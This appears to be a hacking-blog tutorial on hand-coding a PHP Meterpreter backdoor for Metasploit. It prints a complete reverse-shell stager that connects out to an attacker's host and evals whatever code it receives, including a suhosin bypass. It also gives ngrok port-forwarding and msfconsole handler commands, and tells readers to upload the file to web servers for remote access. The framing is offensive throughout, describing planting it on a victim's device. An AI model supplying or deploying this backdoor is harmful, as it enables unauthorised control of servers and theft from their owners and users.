Manually Create PHP Backdoor Of Metasploit

Hi guys we are come back with another tutorial in which we going to teach you how to manually create a php backdoor for metasploit and then how to exploit it. So if you guys excited let's get started.

Lot's of people ask me what is the advantage of manually coding or creating payload for metasploit when we can generate it with metasploit?

So let us suppose if an hacker or attacker have victim device for some time and there is no any other equipment like Android. Laptop, etc. for generating a backdoor. So in this case they can manually code or create backdoor in victim device and then exploit it any time with metasploit.

So first of all you need to set port forwarding because as we all know php used in web application so that's way it is out of local area network. We can do temporary port forwarding with using ngrok server or for permanent access we can use portmap website ( As we mentioned in our previous posts).

  • Ngrok (Temporary Port Forwarding)
  • Portmap (Permanent Port Forwarding)
So in my case i am going to show you a demo so using ngrok for temporary port forwarding and resultant get following configurations.

> tcp://0.tcp.ngrok.io:14817 -> localhost:4444

In your case its always different.

So it's time to make or code a php backdoor (If you have basic php knowledge then your work is easy or if you don't have then just cope paste given code but remember to add your local host and local port in backdoor.

-------------------------------------------------(Copy Given Code)-------------------------------------------------------------

/*<?php /**/ error_reporting(0); $ip = 'lhost'; $port = lport; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();


 Now save this file as filename.php. You can use Ctrl + F to find the lhost and lport in code and then put your details.

Note :- This is important to add lhost and lport in code otherwise payload doesn't response 

Everything is done now setup exploitation in your metasploit console with given commands.

$ msfconsole

$ use exploit/multi/handler

$ set payload php/meterpreter/reverse_tcp

$ set lhost

$ set lport 4444

$ exploit

Now you just need to upload this php file in web servers and then refresh the www.example.com/filename.php . Your meterpreter session successfully started. use help command for options.

I hope this information is helpful for you and if you found something interesting in our blog site then please make sure to subscribe us for future update and stay connected on our other social media platforms. Thanks for visiting have a nice day.

[*] You can also follow us on Instagram and YouTube
[*] Our Github and Facebook Profiles.

Mohit Saran(Hacker's King)